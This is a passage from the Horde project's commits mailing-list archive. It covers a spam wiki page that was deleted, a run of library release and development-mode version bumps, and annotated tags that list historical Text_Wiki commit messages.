http://github.com/horde/horde-web/commit/e552ee65d3e73dc0b79c9b6fa11e2345793b8680 From wikiguest at horde.org Sat Sep 16 22:55:35 2017 From: wikiguest at horde.org (Wiki Guest) Date: Sat, 16 Sep 2017 22:55:35 +0000 Subject: [commits] [Wiki] created: http:/bvunqhdbizqxyuoe.onion Message-ID: <20170916225535.Horde.CHrbiIUHm4QEGJ8CUqNAXVB@wiki.horde.org> guest [199.87.154.255] Sat, 16 Sep 2017 22:55:35 +0000 Created page: https://wiki.horde.org/http%3A/bvunqhdbizqxyuoe.onion [[toc]] + Project Name Project summary and goal. Please include what the scope of the project is, what applications or libraries it touches, and what it is intended to accomplish at a minimum. ++ Bugs List any tickets on http://bugs.horde.org/ that cover this issue or are relevant to it. ++ People Who is or might be involved in this project? Who can answer questions about it, either about a specific technology (iCalendar) or about a specific part of Horde (Kronolith)? ++ Description Detailed project description. Include implementation steps, current status, plan, etc. ++ Resources Include links to protocol descriptions, specifications, RFCs, external applications, presentations on http://horde.org/papers/ or elsewhere that are relevant, articles, API docs from http://dev.horde.org/ - anything that might be useful to someone working on this. ---- Back to the ((Project|Project List)) From wikiguest at horde.org Mon Sep 18 11:27:11 2017 From: wikiguest at horde.org (Wiki Guest) Date: Mon, 18 Sep 2017 11:27:11 +0000 Subject: [commits] [Wiki] attachment: http:/bvunqhdbizqxyuoe.onion, IMAD ALG Message-ID: <20170918112711.Horde.Tx-fiqPP3q71kf3BJX_DeH3@wiki.horde.org> guest [105.107.49.157] Mon, 18 Sep 2017 11:27:11 +0000 New attachment "IMAD ALG" to page "http:/bvunqhdbizqxyuoe.onion". View page: https://wiki.horde.org/http%3A/bvunqhdbizqxyuoe.onion From jan at horde.org Mon Sep 18 12:13:42 2017 From: jan at horde.org (Jan Schneider) Date: Mon, 18 Sep 2017 12:13:42 +0000 Subject: [commits] [Wiki] deleted: http:/bvunqhdbizqxyuoe.onion Message-ID: <20170918121342.Horde.I9DUFVMrxN4FNoC_EE8G_iD@wiki.horde.org> jan Mon, 18 Sep 2017 12:13:42 +0000 Deleted page: http:/bvunqhdbizqxyuoe.onion From jan at horde.org Mon Sep 18 18:39:36 2017 From: jan at horde.org (Jan Schneider) Date: Mon, 18 Sep 2017 20:39:36 +0200 (CEST) Subject: [commits] Horde branch FRAMEWORK_5_2 updated. 93a0ba74a3959ee2506ea856f0711775caf9c0ac Message-ID: <20170918183936.DE433100C44@spencer.horde.org> The branch "FRAMEWORK_5_2" has been updated. The following is a summary of the commits. from: 20e29cd285c0c75d58ccd5b16bf7761c6727df0a 93a0ba7 Prepare releases. Summary: http://github.com/horde/horde/compare/20e29cd285c0c75d58ccd5b16bf7761c6727df0a...93a0ba74a3959ee2506ea856f0711775caf9c0ac ----------------------------------------------------------------------- commit 93a0ba74a3959ee2506ea856f0711775caf9c0ac Author: Jan Schneider Date: Mon Sep 18 20:39:19 2017 +0200 Prepare releases. ansel/docs/RELEASE_NOTES | 8 ++++---- horde/docs/RELEASE_NOTES | 9 +++++---- imp/docs/RELEASE_NOTES | 6 +++--- ingo/docs/RELEASE_NOTES | 11 ++++------- kronolith/docs/RELEASE_NOTES | 9 +++++---- mnemo/docs/RELEASE_NOTES | 7 ++++--- passwd/docs/CHANGES | 2 +- passwd/docs/RELEASE_NOTES | 1 + trean/docs/RELEASE_NOTES | 8 ++++---- turba/docs/RELEASE_NOTES | 9 ++++----- whups/docs/RELEASE_NOTES | 9 ++++----- 11 files changed, 39 insertions(+), 40 deletions(-) http://github.com/horde/horde/commit/93a0ba74a3959ee2506ea856f0711775caf9c0ac From jan at horde.org Mon Sep 18 23:15:00 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 19 Sep 2017 01:15:00 +0200 (CEST) Subject: [commits] Horde Web Source branch master updated. b05f741510cb4cbeb496c4e95ddeab07f9deeb0c Message-ID: <20170918231500.83066100C4F@spencer.horde.org> The branch "master" has been updated. The following is a summary of the commits. from: e552ee65d3e73dc0b79c9b6fa11e2345793b8680 b05f741 Crontab: update documentation files. Summary: http://github.com/horde/horde-web/compare/e552ee65d3e73dc0b79c9b6fa11e2345793b8680...b05f741510cb4cbeb496c4e95ddeab07f9deeb0c ----------------------------------------------------------------------- commit b05f741510cb4cbeb496c4e95ddeab07f9deeb0c Author: Jan Schneider Date: Tue Sep 19 01:14:55 2017 +0200 Crontab: update documentation files. app/views/App/apps/ansel/docs/RELEASE_NOTES.html | 6 +++--- app/views/App/apps/horde/docs/RELEASE_NOTES.html | 7 ++++--- app/views/App/apps/imp/docs/RELEASE_NOTES.html | 6 +++--- app/views/App/apps/ingo/docs/RELEASE_NOTES.html | 9 +++------ app/views/App/apps/kronolith/docs/RELEASE_NOTES.html | 7 ++++--- app/views/App/apps/mnemo/docs/RELEASE_NOTES.html | 7 ++++--- app/views/App/apps/passwd/docs/CHANGES.html | 2 +- app/views/App/apps/passwd/docs/RELEASE_NOTES.html | 3 ++- app/views/App/apps/trean/docs/RELEASE_NOTES.html | 6 +++--- app/views/App/apps/turba/docs/RELEASE_NOTES.html | 7 +++---- app/views/App/apps/whups/docs/RELEASE_NOTES.html | 7 +++---- 11 files changed, 33 insertions(+), 34 deletions(-) http://github.com/horde/horde-web/commit/b05f741510cb4cbeb496c4e95ddeab07f9deeb0c From jan at horde.org Tue Sep 19 12:12:33 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 19 Sep 2017 14:12:33 +0200 (CEST) Subject: [commits] Horde branch master updated. f7672ebc89530aa2f201b0f9bb66c9e7477e77b1 Message-ID: <20170919121236.6A4F1100A27@spencer.horde.org> The branch "master" has been updated. The following is a summary of the commits. from: c1c1d9b93e64816e303cc4a3f94f5c509d8a8023 b87868c Released Horde_Autoloader_Cache-2.1.3 d8fee33 Development mode for Horde_Autoloader_Cache-2.1.4 6e6dc64 Released Horde_Browser-2.0.15 71d3c8b Development mode for Horde_Browser-2.0.16 8f8aced Released Horde_Crypt-2.7.10 50921e7 Development mode for Horde_Crypt-2.7.11 5becfab Released Horde_CssMinify-1.0.4 77644f6 Development mode for Horde_CssMinify-1.0.5 00fd27f Released Horde_Editor-2.0.5 0b2e9f9 Development mode for Horde_Editor-2.0.6 64da7ea Released Horde_ElasticSearch-1.0.4 5ed1bae Development mode for Horde_ElasticSearch-1.0.5 03f19d2 Released Horde_Imsp-2.0.10 7b618ab Development mode for Horde_Imsp-2.0.11 62dc774 Released Horde_JavascriptMinify-1.1.5 6564dea Development mode for Horde_JavascriptMinify-1.1.6 21119d6 Released Horde_Oauth-2.0.4 c36d2e2 Development mode for Horde_Oauth-2.0.5 e9d3290 Released Horde_OpenXchange-1.0.1 496fa63 Development mode for Horde_OpenXchange-1.0.2 136c361 Released Horde_Queue-1.1.5 68e6e38 Development mode for Horde_Queue-1.1.6 48bbf19 Released Horde_Scheduler-2.0.3 38c520c Development mode for Horde_Scheduler-2.0.4 757dc5d Released Horde_Scribe-2.0.3 3c374fc Development mode for Horde_Scribe-2.0.4 bc8f3c3 Released Horde_Service_Facebook-2.0.10 bf769ee Development mode for Horde_Service_Facebook-2.0.11 4666299 Released Horde_Service_Twitter-2.1.6 30b8c63 Development mode for Horde_Service_Twitter-2.1.7 31c074e Released Horde_Service_UrlShortener-2.0.3 86858c4 Development mode for Horde_Service_UrlShortener-2.0.4 ae9ddbb Released Horde_Stringprep-1.0.4 9db2421 Development mode for Horde_Stringprep-1.0.5 d16e707 Released Horde_Thrift-2.0.3 8ea3a1e Development mode for Horde_Thrift-2.0.4 b0dde7c Released Horde_Tree-2.0.5 f7672eb Development mode for Horde_Tree-2.0.6 Summary: http://github.com/horde/horde/compare/c1c1d9b93e64816e303cc4a3f94f5c509d8a8023...f7672ebc89530aa2f201b0f9bb66c9e7477e77b1 ----------------------------------------------------------------------- commit b87868cee6788c49083bacb8d59e71cdc36138f8 Author: Jan Schneider Date: Tue Sep 19 10:15:24 2017 +0200 Released Horde_Autoloader_Cache-2.1.3 framework/Autoloader_Cache/composer.json | 6 +++--- framework/Autoloader_Cache/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/b87868cee6788c49083bacb8d59e71cdc36138f8 ----------------------------------------------------------------------- commit d8fee33f32d8fa7f1d24a68914aa1976ef47363d Author: Jan Schneider Date: Tue Sep 19 10:15:24 2017 +0200 Development mode for Horde_Autoloader_Cache-2.1.4 framework/Autoloader_Cache/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/d8fee33f32d8fa7f1d24a68914aa1976ef47363d ----------------------------------------------------------------------- commit 6e6dc64001a1dd8ff30ce6a3d114aeb7ad1e866b Author: Jan Schneider Date: Tue Sep 19 10:23:57 2017 +0200 Released Horde_Browser-2.0.15 framework/Browser/composer.json | 6 +++--- framework/Browser/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/6e6dc64001a1dd8ff30ce6a3d114aeb7ad1e866b ----------------------------------------------------------------------- commit 71d3c8b819b30d28273026af0785d5d3086a5332 Author: Jan Schneider Date: Tue Sep 19 10:23:58 2017 +0200 Development mode for Horde_Browser-2.0.16 framework/Browser/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/71d3c8b819b30d28273026af0785d5d3086a5332 ----------------------------------------------------------------------- commit 8f8acedc7a5a9cef72d8ffd390060e5ca2736787 Author: Jan Schneider Date: Tue Sep 19 10:31:41 2017 +0200 Released Horde_Crypt-2.7.10 framework/Crypt/composer.json | 4 ++-- framework/Crypt/package.xml | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) http://github.com/horde/horde/commit/8f8acedc7a5a9cef72d8ffd390060e5ca2736787 ----------------------------------------------------------------------- commit 50921e799e02e57b133ea58ab8135b8bcbe9facc Author: Jan Schneider Date: Tue Sep 19 10:31:41 2017 +0200 Development mode for Horde_Crypt-2.7.11 framework/Crypt/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/50921e799e02e57b133ea58ab8135b8bcbe9facc ----------------------------------------------------------------------- commit 5becfab05bc431c960b74dcd636eb2ac149e10ff Author: Jan Schneider Date: Tue Sep 19 10:37:45 2017 +0200 Released Horde_CssMinify-1.0.4 framework/CssMinify/composer.json | 6 +++--- framework/CssMinify/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/5becfab05bc431c960b74dcd636eb2ac149e10ff ----------------------------------------------------------------------- commit 77644f6e7f00c442e7047cf0dbdfd03fb1a6cf3f Author: Jan Schneider Date: Tue Sep 19 10:37:45 2017 +0200 Development mode for Horde_CssMinify-1.0.5 framework/CssMinify/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/77644f6e7f00c442e7047cf0dbdfd03fb1a6cf3f ----------------------------------------------------------------------- commit 00fd27fe1acccdb441f501bb06e4d199f829f27d Author: Jan Schneider Date: Tue Sep 19 10:44:42 2017 +0200 Released Horde_Editor-2.0.5 framework/Editor/composer.json | 6 +++--- framework/Editor/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/00fd27fe1acccdb441f501bb06e4d199f829f27d ----------------------------------------------------------------------- commit 0b2e9f9f12d8d7e5d9a5e66312a21e9fbde982b7 Author: Jan Schneider Date: Tue Sep 19 10:44:42 2017 +0200 Development mode for Horde_Editor-2.0.6 framework/Editor/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/0b2e9f9f12d8d7e5d9a5e66312a21e9fbde982b7 ----------------------------------------------------------------------- commit 64da7ea130c6cab1a7d5ed99e3063d9f31c9801d Author: Jan Schneider Date: Tue Sep 19 10:51:00 2017 +0200 Released Horde_ElasticSearch-1.0.4 framework/ElasticSearch/composer.json | 6 +++--- framework/ElasticSearch/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/64da7ea130c6cab1a7d5ed99e3063d9f31c9801d ----------------------------------------------------------------------- commit 5ed1baee189a2af595785646d4150ba241edc7b9 Author: Jan Schneider Date: Tue Sep 19 10:51:00 2017 +0200 Development mode for Horde_ElasticSearch-1.0.5 framework/ElasticSearch/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/5ed1baee189a2af595785646d4150ba241edc7b9 ----------------------------------------------------------------------- commit 03f19d2f606761dd7ef5fe39b40d087a09aec31e Author: Jan Schneider Date: Tue Sep 19 10:57:07 2017 +0200 Released Horde_Imsp-2.0.10 framework/Imsp/composer.json | 6 +++--- framework/Imsp/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/03f19d2f606761dd7ef5fe39b40d087a09aec31e ----------------------------------------------------------------------- commit 7b618abf8d633033bc5a9af1716f2d96f8f7a572 Author: Jan Schneider Date: Tue Sep 19 10:57:07 2017 +0200 Development mode for Horde_Imsp-2.0.11 framework/Imsp/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/7b618abf8d633033bc5a9af1716f2d96f8f7a572 ----------------------------------------------------------------------- commit 62dc7741ed950f76f8e5a5a78ffc3ec00bdae006 Author: Jan Schneider Date: Tue Sep 19 11:04:24 2017 +0200 Released Horde_JavascriptMinify-1.1.5 framework/JavascriptMinify/composer.json | 6 +++--- framework/JavascriptMinify/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/62dc7741ed950f76f8e5a5a78ffc3ec00bdae006 ----------------------------------------------------------------------- commit 6564dea95f2e09a9074da6e7e5779fb028a2fa99 Author: Jan Schneider Date: Tue Sep 19 11:04:25 2017 +0200 Development mode for Horde_JavascriptMinify-1.1.6 framework/JavascriptMinify/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/6564dea95f2e09a9074da6e7e5779fb028a2fa99 ----------------------------------------------------------------------- commit 21119d6be25ae3ddd84ed7d180eafb054e35b6c1 Author: Jan Schneider Date: Tue Sep 19 11:13:31 2017 +0200 Released Horde_Oauth-2.0.4 framework/Oauth/composer.json | 6 +++--- framework/Oauth/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/21119d6be25ae3ddd84ed7d180eafb054e35b6c1 ----------------------------------------------------------------------- commit c36d2e2ca78bc77cc4ded0b64bdc41f53355998e Author: Jan Schneider Date: Tue Sep 19 11:13:31 2017 +0200 Development mode for Horde_Oauth-2.0.5 framework/Oauth/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/c36d2e2ca78bc77cc4ded0b64bdc41f53355998e ----------------------------------------------------------------------- commit e9d32906b68987115cadd97d1cd99aec673a0bec Author: Jan Schneider Date: Tue Sep 19 11:19:35 2017 +0200 Released Horde_OpenXchange-1.0.1 framework/OpenXchange/composer.json | 6 +++--- framework/OpenXchange/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/e9d32906b68987115cadd97d1cd99aec673a0bec ----------------------------------------------------------------------- commit 496fa632719d4fc4df7908c5b8a925feeeedd6b7 Author: Jan Schneider Date: Tue Sep 19 11:19:36 2017 +0200 Development mode for Horde_OpenXchange-1.0.2 framework/OpenXchange/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/496fa632719d4fc4df7908c5b8a925feeeedd6b7 ----------------------------------------------------------------------- commit 136c3610691cb95167823d183711deb81806a3f0 Author: Jan Schneider Date: Tue Sep 19 11:25:36 2017 +0200 Released Horde_Queue-1.1.5 framework/Queue/composer.json | 6 +++--- framework/Queue/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/136c3610691cb95167823d183711deb81806a3f0 ----------------------------------------------------------------------- commit 68e6e38709ab0caf475b704d804bb1c971d91fc8 Author: Jan Schneider Date: Tue Sep 19 11:25:37 2017 +0200 Development mode for Horde_Queue-1.1.6 framework/Queue/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/68e6e38709ab0caf475b704d804bb1c971d91fc8 ----------------------------------------------------------------------- commit 48bbf192ac8b331fa7631387bdec3f77c2c61e73 Author: Jan Schneider Date: Tue Sep 19 11:52:54 2017 +0200 Released Horde_Scheduler-2.0.3 framework/Scheduler/composer.json | 6 +++--- framework/Scheduler/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/48bbf192ac8b331fa7631387bdec3f77c2c61e73 ----------------------------------------------------------------------- commit 38c520c45ad4cf389a13f7b4a71ffb7e8b3bc20d Author: Jan Schneider Date: Tue Sep 19 11:52:55 2017 +0200 Development mode for Horde_Scheduler-2.0.4 framework/Scheduler/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/38c520c45ad4cf389a13f7b4a71ffb7e8b3bc20d ----------------------------------------------------------------------- commit 757dc5d01fbe3c710b59abe865028b0bbb13e0c5 Author: Jan Schneider Date: Tue Sep 19 11:59:18 2017 +0200 Released Horde_Scribe-2.0.3 framework/Scribe/composer.json | 6 +++--- framework/Scribe/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/757dc5d01fbe3c710b59abe865028b0bbb13e0c5 ----------------------------------------------------------------------- commit 3c374fc922ca0d1d0873ae376ae9b4b78acfce24 Author: Jan Schneider Date: Tue Sep 19 11:59:18 2017 +0200 Development mode for Horde_Scribe-2.0.4 framework/Scribe/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/3c374fc922ca0d1d0873ae376ae9b4b78acfce24 ----------------------------------------------------------------------- commit bc8f3c3a0aeb24a226dff05154018af0778ba0f6 Author: Jan Schneider Date: Tue Sep 19 13:04:08 2017 +0200 Released Horde_Service_Facebook-2.0.10 framework/Service_Facebook/composer.json | 6 +++--- framework/Service_Facebook/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/bc8f3c3a0aeb24a226dff05154018af0778ba0f6 ----------------------------------------------------------------------- commit bf769ee732edd1efa35e0e3619278af6bba2cb91 Author: Jan Schneider Date: Tue Sep 19 13:04:08 2017 +0200 Development mode for Horde_Service_Facebook-2.0.11 framework/Service_Facebook/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/bf769ee732edd1efa35e0e3619278af6bba2cb91 ----------------------------------------------------------------------- commit 4666299dabf35c395fa4019723803d42bf2d427f Author: Jan Schneider Date: Tue Sep 19 13:10:13 2017 +0200 Released Horde_Service_Twitter-2.1.6 framework/Service_Twitter/composer.json | 6 +++--- framework/Service_Twitter/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/4666299dabf35c395fa4019723803d42bf2d427f ----------------------------------------------------------------------- commit 30b8c63b1890a4b8c1edae96f058bb05c55209e3 Author: Jan Schneider Date: Tue Sep 19 13:10:13 2017 +0200 Development mode for Horde_Service_Twitter-2.1.7 framework/Service_Twitter/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/30b8c63b1890a4b8c1edae96f058bb05c55209e3 ----------------------------------------------------------------------- commit 31c074e0ffd5f8d98f61bdb10c01bb0eb750af68 Author: Jan Schneider Date: Tue Sep 19 13:47:11 2017 +0200 Released Horde_Service_UrlShortener-2.0.3 framework/Service_UrlShortener/composer.json | 6 +++--- framework/Service_UrlShortener/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/31c074e0ffd5f8d98f61bdb10c01bb0eb750af68 ----------------------------------------------------------------------- commit 86858c4baddc3a41707ff004b6572c4a11fa2ade Author: Jan Schneider Date: Tue Sep 19 13:47:11 2017 +0200 Development mode for Horde_Service_UrlShortener-2.0.4 framework/Service_UrlShortener/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/86858c4baddc3a41707ff004b6572c4a11fa2ade ----------------------------------------------------------------------- commit ae9ddbb1d825a908afe8e419c3864ceb220dedd9 Author: Jan Schneider Date: Tue Sep 19 13:56:48 2017 +0200 Released Horde_Stringprep-1.0.4 framework/Stringprep/composer.json | 6 +++--- framework/Stringprep/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/ae9ddbb1d825a908afe8e419c3864ceb220dedd9 ----------------------------------------------------------------------- commit 9db24219d242bc0e8edbd91a475fa54b48f412e7 Author: Jan Schneider Date: Tue Sep 19 13:56:48 2017 +0200 Development mode for Horde_Stringprep-1.0.5 framework/Stringprep/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/9db24219d242bc0e8edbd91a475fa54b48f412e7 ----------------------------------------------------------------------- commit d16e70715efdfbe61b549ae2dcd21b6acb644589 Author: Jan Schneider Date: Tue Sep 19 14:02:53 2017 +0200 Released Horde_Thrift-2.0.3 framework/Thrift/composer.json | 6 +++--- framework/Thrift/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/d16e70715efdfbe61b549ae2dcd21b6acb644589 ----------------------------------------------------------------------- commit 8ea3a1e59998b03ec6deb2ebcd06423a5761e7cd Author: Jan Schneider Date: Tue Sep 19 14:02:53 2017 +0200 Development mode for Horde_Thrift-2.0.4 framework/Thrift/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/8ea3a1e59998b03ec6deb2ebcd06423a5761e7cd ----------------------------------------------------------------------- commit b0dde7c94ee222c47b087959d9646f9b80eecee8 Author: Jan Schneider Date: Tue Sep 19 14:10:53 2017 +0200 Released Horde_Tree-2.0.5 framework/Tree/composer.json | 6 +++--- framework/Tree/package.xml | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/b0dde7c94ee222c47b087959d9646f9b80eecee8 ----------------------------------------------------------------------- commit f7672ebc89530aa2f201b0f9bb66c9e7477e77b1 Author: Jan Schneider Date: Tue Sep 19 14:10:53 2017 +0200 Development mode for Horde_Tree-2.0.6 framework/Tree/package.xml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/f7672ebc89530aa2f201b0f9bb66c9e7477e77b1 From jan at horde.org Tue Sep 19 12:12:54 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 19 Sep 2017 14:12:54 +0200 (CEST) Subject: [commits] Horde annotated tag horde_browser-2.0.15 created. 9742275eb156a0b106cd93e4969957b94878b4bb Message-ID: <20170919121255.133B7100A27@spencer.horde.org> The annotated tag "horde_browser-2.0.15" has been created. at 9742275eb156a0b106cd93e4969957b94878b4bb (tag) tagging 6e6dc64001a1dd8ff30ce6a3d114aeb7ad1e866b (commit) replaces horde_autoloader_cache-2.1.3 tagged by Jan Schneider on Tue Sep 19 10:23:57 2017 +0200 ----------------------------------------------------------------------- Released Horde_Browser-2.0.15. Jan Schneider (2): Development mode for Horde_Autoloader_Cache-2.1.4 Released Horde_Browser-2.0.15 From jan at horde.org Tue Sep 19 12:12:50 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 19 Sep 2017 14:12:50 +0200 (CEST) Subject: [commits] Horde annotated tag horde_autoloader_cache-2.1.3 created. fb8ba72c64b9ebee8d968c0b7a5c1f753d75918a Message-ID: <20170919121251.4EB1E100A27@spencer.horde.org> The annotated tag "horde_autoloader_cache-2.1.3" has been created. at fb8ba72c64b9ebee8d968c0b7a5c1f753d75918a (tag) tagging b87868cee6788c49083bacb8d59e71cdc36138f8 (commit) replaces horde_mime_viewer-2.2.2 tagged by Jan Schneider on Tue Sep 19 10:15:24 2017 +0200 ----------------------------------------------------------------------- Released Horde_Autoloader_Cache-2.1.3. Christian Weiske (2): PHP5 constructor must be first for upwards compatibility Make static methods static Daniel Convissor (1): Remove error reporting in tests. (Bug #19028) Daniel O'Connor (21): QA release prep 1.0.2 Bug #12722 HTML Blockquote compliance Request #12569 Adding 'base_url' to XHTML Toc renderer Bug #12719 Blockquote parsing bugs Fix skip behaviour check Remove skipping behaviour Remove skipping behaviour Updated test expectations Update test expectations Prevent E_NOTICE Updated test expectations (TODO - go learn more about LaTeX to ensure this is actually correct) Add travis Bug #20110 package.xml does not validate Remove package 1.0 Bug #20110 package.xml does not validate Bug #20110 package.xml does not validate Bug #20110 package.xml does not validate Release prep Trailing tag Update Del Elson (5): Whitespace changes only. Change to allow code type="parsed" Reversed order of parameters in singleton. Fix for new parameter order in singleton. Fix for non-default instantiations of the constructor. Firman Wandayandi (3): Add superscript and subscript extension Turn on Superscript and Subscript rules Request #5767: relative [url] syntax not supported (e.g. [url=/contact.php]) Gwynne Raskind (2): Standard project directories initialized by cvs2svn. fix a huge number of wrong MIME types. UGH. Jan Schneider (45): Development mode for Horde_Mime_Viewer-2.2.3 Use Horde_Crypt_Translation. Assume two-digit year is in the current century. Fix file modes. Make constructors BC and FC. Remove debug output. Remove unnecessary reference, causing E_NOTICEs. Don't strip the leading linebreak off blockquotes. Fix test. Fix tests. [jan] Fix time offsets when importing CSV data with two-digit years. Prepare for adding a subtree. Squashed 'wicked/lib/Text_Wiki/' content from commit 301610e Merge commit '9460590060bdc10d6e7f02ca44b2dc586e236504' as 'wicked/lib/Text_Wiki' Re-merge Horde customizations and extensions. Remove PHP 4 constructors. Merge commit '2b7fa546469029009782bcab89c41c9c108f2da6' Use PHP 5 constructors in our own parsers too. Load the bundled Text_Wiki. Removed too much. [jan] Bundle Text_Wiki and fix it to run on PHP 7. Remove Text_Wiki dependency. Update file list. Disable ext/ldap temporarily. Update dependencies. Update tests. Remove conflict marker. Fix package names. Trusty doesn't work. Consider all remaining libaries as PHP 7 compatible. Consider all applications as PHP 7 compatible. Add test for key generation. Unused Save whether this is GnuPG 2.1+. [jan] Correctly determine expiration dates of short living PGP keys. This is no longer necessary. Sign return URL passed to login link. [jan] Fix returning to last URL after using the login link. Massage array structure to expected layout. Those aren't valid UTF-8 characters. split() is deprecated. Fix throwing exception. Catch exceptions. Trusty may be fixed. Released Horde_Autoloader_Cache-2.1.3 Justin Patrin (70): Adding Underline rules Allow recursive sections. This won't happen often, but could be useful. Adding underline to rules Switching back, toggg says it doesn't work Fix bug #4719, "In Latex, newline rule does not produce a new line" Checking in Cowiki, DokuWiki, and TikiWiki parsers and renderers Checking in missing Render classes (I thought I'd added these before..) Adding Text_Wiki_Tiki package file Fix summary and description Adding apckage.xml for Text_Wiki_Doku Adding package.xml for Text_Wiki_Cowiki Add toggg as a lead for all 3 new packages (sorry about that toggg) Fix undefined offset error Fix undefined offset errors Fix undefined variable notice Fix setting of anchor, fix output of links (new link code has not been merged to mainline yet....) add missing return Put back new style links for Doku wikilink Add support for wikilinks which are split into start and end tokens around link text Deak with the case where the text is empty Fix undefined offset notices in Cowiki parser's Wikilink and Interwiki rules Re-add code to not set 'text' if no explicit text is given When text option is empty, use page which is not urlEncoded and textEncode it Revert rename of singleton Replace preg_replace with str_replace, fix variable names Revert changes to constructor as it cannot instantiate the parser class as it should Alter factory to check to make sure the file is readable before including it Check in factory using @fopen($file, 'r', true) instead of looping over include_path Switch to Text_Wiki error handling for factory and singleton Set $wiki->newRendering to use new experimental preg_replace_callback rendering method Move encoding calls to where the HTML is created instead of before processing happens Added a comment urlencode the part of the anchor after # textEncode css before inserting into HTML Fix issues with parsing URLs in (( )) Fix notice about undefined index page Fix paragraph rendering for Dokuwiki Encode text to avoid XSS Bug 8313 fix anchor output when used in conjuction with sprintf (thanks to bjs5075 at rit dot edu) Set up a configuration variable (temporarily) to switch renderer algorithms Prepare for 1.2.0RC1 release Adding package2.xml, fixing multi-line summary Add a stack-based rendering callback system which allows for renderers to easily alter the text between start and end tokens (such as for Blockquote wiki-format output) Adding the first test Add balanced token checking Byg #7320 use UTF-8 syntax instead of "extended" Combine UTF-8 and non-UTF-8 regexes....this will probably fail horribly Only use \p is ext_chars is on. This should be switched to be turn on utf8... Add another UTF-8-ism Bug #7320 add a new utf-8 parse option for Wikilink and Freelink Bug #6292 force headings and hrs to have extra newlines around them to avoid them being in paragraph tags (thanks to ) sprintf if slow Update for release Prepare for new release Correctversion number If target == '_self' don't add an onclick Request #10128 use CSS instead of the depracetd align attribute for images. Thanks to ritzmo (Moritz Venn) for the patch Add support for alignment in image links Bug #11262 Fix issues with any block causing no output Bug #10144 Fix all lower-case rule names Prepare for 1.2.0 release API should be stable too Bug #12490 change delim to a utf-8 compatible value Bug #12619 allow any number of spaces before the list items Bug #12580 fix license bug #14869 add SKIPIF for mossing config, thanks to daniel use an include Update wikilink renderers to be backwards-compatible Fix syntax error Bug #15758 Add # as a possibility for the last char in a URL Michele Tomaiuolo (76): First commit of Text_Wiki_Creole - parser and renderer. Fingers crossed :-) start/end tokens check-inner-tags counts open/end tags *** empty log message *** *** empty log message *** making the parser compliant with version 0.4 of specs making creole parser compliant with version 0.4 of specs making creole parser compliant with version 0.4 of specs making creole parser compliant with version 0.4 of specs making creole parser compliant with version 0.4 of specs making creole parser compliant with version 0.4 of 